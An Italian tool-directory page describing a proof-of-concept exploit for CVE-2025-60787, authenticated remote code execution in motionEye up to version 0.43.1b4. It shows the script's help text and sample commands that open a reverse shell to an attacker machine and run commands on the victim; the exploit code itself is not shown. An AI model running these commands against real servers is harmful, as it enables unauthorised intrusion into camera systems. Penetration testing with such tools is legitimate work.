Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-60787 — PoC automatizzato per CVE-2025-60787 che fornisce esecuzione remota di codice autenticata contro server motionEye fino alla versione 0.43.1b4, con modalità di reverse shell ed esecuzione di comandi. | Kitploit
Strumenti/GitHubGitHub/gunzf0x/cve-2025-60787
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingRed TeamingStrumento di Accesso Remoto
GitHubgunzf0x/cve-2025-60787

CVE-2025-60787

PoC automatizzato per CVE-2025-60787 che fornisce esecuzione remota di codice autenticata contro server motionEye fino alla versione 0.43.1b4, con modalità di reverse shell ed esecuzione di comandi.

Vedi Repository
101176 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-60787 - RCE autenticato in motionEye

PoC per CVE-2025-60787, una vulnerabilità RCE autenticata per motionEye con tutte le versioni interessate fino alla 0.43.1b4 (inclusa).

Questo è un PoC automatizzato per la vulnerabilità descritta in questo repository. Crediti a prabhatverma47.

Utilizzo

Lo script ha 2 comandi che sfruttano la vulnerabilità. Uno che invia direttamente una reverse shell chiamato revshell e un altro comando chiamato command per eseguire direttamente comandi sfruttando questa CVE.

root@kitploit:~
❯ python3 CVE-2025-60787.py -h

usage: CVE-2025-60787.py [-h] {revshell,command} ...

PoC for CVE-2025-60787 -- Authenticated RCE in motionEye by gunzf0x

positional arguments:
  {revshell,command}  Choose between send a reverse shell or (attempting to) run commands
    revshell          Attempt to send a reverse shell using CVE-2025-60787 vuln
    command           Execute a command remotely using CVE-2025-60787 vuln

options:
  -h, --help          show this help message and exit

Reverse Shell

Usa il comando revshell per ottenere una shell. Per esempio:

root@kitploit:~
python3 CVE-2025-60787.py revshell --url 'http://10.10.10.10:8765' --user 'admin' --password 'StrongPassw0rd123!' -i 10.10.10.15 --port 9001

Dove 10.10.10.10 è la macchina target (la macchina che esegue motionEye), 10.10.10.15 è la nostra macchina attaccante e 9001 è la porta su cui siamo in ascolto per catturare una reverse shell.

Esecuzione di comandi

Se invece di una reverse shell vogliamo eseguire altri comandi remotamente, possiamo usare l'opzione command. Per esempio, esegui il comando ping -c1 10.10.10.15 nella macchina vittima:

root@kitploit:~
python3 CVE-2025-60787.py command --url 'http://10.10.10.10:8765' --user 'admin' --password 'StrongPassw0rd123!' -e 'ping -c1 10.10.10.15'

Dove 10.10.10.10 è la macchina che esegue motionEye.

Dichiarazione di non responsabilità

Usa questo script sempre sotto la tua responsabilità.

Sii etico (:

Scarica lo strumento